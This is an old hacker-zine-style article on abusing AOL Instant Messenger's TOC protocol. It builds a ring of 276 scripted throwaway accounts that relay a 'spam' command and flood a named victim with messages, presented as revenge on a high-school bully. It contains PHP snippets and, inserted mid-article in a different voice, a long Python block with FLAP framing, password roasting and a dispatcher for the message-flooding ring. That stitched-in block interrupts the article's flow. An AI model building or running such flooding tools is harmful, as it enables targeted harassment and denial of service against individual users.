Creating AIM Mayhem

by windwake

Server protocol commands are seldom typed by a user manually; the program they're using almost always sends them automatically.

The closest most people come to this is Internet Relay Chat (IRC), where you are almost encouraged to type raw server commands yourself.  But how many people have actually messed with, or even seen, the command protocol behind AOL's Instant Messenger service, or MSN, Yahoo! Messenger, or even Jabber?

The information released about AOL's AIM service is probably the least abused protocol documentation of any messenger service.  For the actual documentation of what gets sent to AOL's servers (the text-based TOC protocol), check out: cvs.sourceforge.net/viewcvs.py/gaim/gaim/doc/Attic/PROTOCOL?rev=1.4

This may not seem useful at first glance, as no one would really take the time to enter any of this manually.

A programmer, though, comprehends after a second or two the true potential that information like this gives them: abusing AOL's service, gathering information about other users, forcing them to sign off, or even extracting more sensitive information from AOL because they know the lingo.

Think about this from a programming perspective.

I have written a program in PHP (yes, the server-based parsing language) that logs in and talks to me when I sign on and talk to it, repeating everything I say, followed by my screenname.  It isn't hard to write a program, in any language (C/C++, PHP, Perl, even VB), that will allow you to sign onto AIM with a screenname, using the protocol by just sending information to their server (in PHP, I used fsockopen() to connect, and fwrite() to send information through the connection; much easier than you would expect).

Now that you have a program/script that will log onto AOL's servers, you know that one screenname won't allow you to wreak utter havoc on the jock that dunked your head in a toilet in high school.

Solution: create more, but follow their names with numbers, each time you create one, adding a number.  For instance, thepwnz0r1, thepwnz0r2, ... thepwnz0r276.

After spending much time creating many screennames, you probably know what you have to do: loop through them.

Take the script you wrote to connect to AIM, but instead of entering the values manually, use thepwnz0r followed by a variable: the number of times the script has looped.

This would look something like this:

  for ($i = 1; $i <= 276; $i++) {
    // connect as "thepwnz0r" followed by the value of $i,
    // logging into "thepwnz0r1" all the way through "thepwnz0r276".
    $screenname = "thepwnz0r" . $i;
  }

You now have a script that will log into 276 screennames.

Of course, you could now hard-code the target, writing the script to spam j0cK4lIfE46234424235 with random messages each time a screenname signs on, virtually disabling him from doing anything.

One problem: you don't want to have to change the code each time and recompile/re-upload it.

I don't blame you; this all gets annoying after a while, and the attack isn't as graceful.

Solution: write code that lets you send thepwnz0r1 a simple line of text, such as spam j0cK4lIfE46234424235, which triggers an if statement like:

if (substr($message, 0, 4) == "spam") {
      $parts = explode(" ", $message);
      // pass the same order on to the next screenname in the circle
      sendmessage("thepwnz0r", $i + 1, $parts[0] . " " . $parts[1]);
      // flood the named victim from this screenname
      spam($parts[1]);
}

spam() would be a function that floods the screenname passed to it with messages, and sendmessage() would forward the same command to the next screenname, continuing the circle.
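What the "connect and send information through the connection" step and the if statement above actually involve on the wire, as an added example that is neither the author's PHP program nor code from the gaim project: the FLAP framing, password roasting and sign-on command of the TOC protocol documented at the URL above, plus the ring dispatcher, written in Python so it runs without a network.  The login host and port, the "Tic/Toc" roasting key, the escape rules and the command formats are as I recall them from that document; the client version string, the screenname base, the message bodies and the sample inbound frame are assumptions made for this example.  It only builds the bytes the article's script would hand to fwrite() and never opens a socket; AIM itself was shut down in 2017, so there is nothing left to connect to anyway.

```python
import struct

# FLAP frame types (from the TOC/FLAP framing in the gaim PROTOCOL document)
FLAP_SIGNON, FLAP_DATA, FLAP_ERROR, FLAP_SIGNOFF, FLAP_KEEPALIVE = 1, 2, 3, 4, 5
ROAST_KEY = b"Tic/Toc"                 # TOC's fixed password "roasting" key
TOC_ESCAPE = set('\\$"{}[]()')         # characters a quoted TOC argument must backslash-escape
CLIENT_VERSION = "TIC:TOC"             # assumed client identifier string for toc_signon


def normalize(screenname: str) -> str:
    """TOC ignores case and spaces in screen names; send them lowercased with spaces removed."""
    return screenname.replace(" ", "").lower()


def roast(password: str) -> str:
    """TOC's password obfuscation: XOR each byte with the repeating key, hex-encode, prefix 0x."""
    raw = password.encode()
    mixed = bytes(b ^ ROAST_KEY[i % len(ROAST_KEY)] for i, b in enumerate(raw))
    return "0x" + mixed.hex()


def quote(arg: str) -> str:
    """Wrap a TOC string argument in double quotes, escaping the reserved characters."""
    return '"' + "".join("\\" + c if c in TOC_ESCAPE else c for c in arg) + '"'


def flap(frame_type: int, seq: int, data: bytes) -> bytes:
    """Build one FLAP frame: '*', 1-byte type, 16-bit sequence number, 16-bit length, payload."""
    return struct.pack(">cBHH", b"*", frame_type, seq & 0xFFFF, len(data)) + data


def parse_flap(buf: bytes):
    """Split one FLAP frame off the front of buf.

    Returns (type, seq, payload, remaining_bytes), or None when the buffer does
    not yet hold a whole frame (a real client keeps reading from the socket).
    """
    if len(buf) < 6 or buf[0:1] != b"*":
        return None
    frame_type, seq, length = struct.unpack(">BHH", buf[1:6])
    if len(buf) < 6 + length:
        return None
    return frame_type, seq, buf[6:6 + length], buf[6 + length:]


def signon_frames(screenname: str, password: str, seq: int = 0) -> list:
    """The client's first two frames after writing 'FLAPON\\r\\n\\r\\n' to the TOC server:
    a SIGNON frame carrying the screen name as a TLV, then a DATA frame with toc_signon.
    Once the server answers SIGN_ON, NICK and CONFIG, the client sends toc_init_done."""
    name = normalize(screenname).encode()
    signon = struct.pack(">IHH", 1, 1, len(name)) + name     # FLAP version 1, TLV tag 1
    cmd = "toc_signon login.oscar.aol.com 5190 %s %s english %s" % (
        normalize(screenname), roast(password), quote(CLIENT_VERSION))
    return [flap(FLAP_SIGNON, seq, signon), flap(FLAP_DATA, seq + 1, cmd.encode() + b"\0")]


def handle_im(line: str, index: int, base: str = "thepwnz0r",
              ring_size: int = 276, burst: int = 3) -> list:
    """Dispatch one inbound server line for ring member <base><index>.

    Only 'IM_IN:<source>:<auto>:<message>' lines whose message is 'spam <target>'
    do anything.  Returns the TOC commands this member should send: the same order
    relayed to the next member (the last member ends the chain instead of wrapping,
    so one order cannot circulate forever), then a burst of IMs at the target.
    """
    if not line.startswith("IM_IN:"):
        return []
    parts = line.split(":", 3)          # the message itself may contain colons
    if len(parts) < 4:
        return []
    words = parts[3].split()
    if len(words) != 2 or words[0].lower() != "spam":
        return []
    target = words[1]
    commands = []
    if index < ring_size:
        commands.append("toc_send_im %s %s" % (normalize(base + str(index + 1)), quote(parts[3])))
    for n in range(burst):
        text = "message %d from %s%d" % (n, base, index)
        commands.append("toc_send_im %s %s" % (normalize(target), quote(text)))
    return commands


if __name__ == "__main__":
    # Constructed example: the frame the server would deliver to thepwnz0r1 when
    # someone IMs it "spam j0cK4lIfE46234424235" (no real socket is opened here).
    inbound = flap(FLAP_DATA, 7, b"IM_IN:someone:F:spam j0cK4lIfE46234424235\0")
    _type, _seq, payload, _rest = parse_flap(inbound)
    for command in handle_im(payload.rstrip(b"\0").decode(), index=1):
        print(command)      # each would be sent as flap(FLAP_DATA, seq, command.encode() + b"\0")
```

The article's 276-screenname loop is signon_frames() called once per name, with index carried into handle_im() so each member knows who comes next.  Note that the roast is only obfuscation, not encryption: anyone sniffing the connection can XOR the bytes back with "Tic/Toc", which is one more reason a throwaway screenname is the right thing to feed this protocol.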

You would then be able to spam someone simply by starting the executable/script and AIM, then sending an instant message to thepwnz0r1 saying: spam [screenname]

There is almost no defense against a script like this, short of the victim getting off AIM, which they would inevitably have to do.

The potential of this TOC protocol is amazing: the amount not only of AIM abuse, but of new functionality and ease of use in third-party programs that can come from it, is astonishing.

Plus, there's nothing that AOL can do about it.
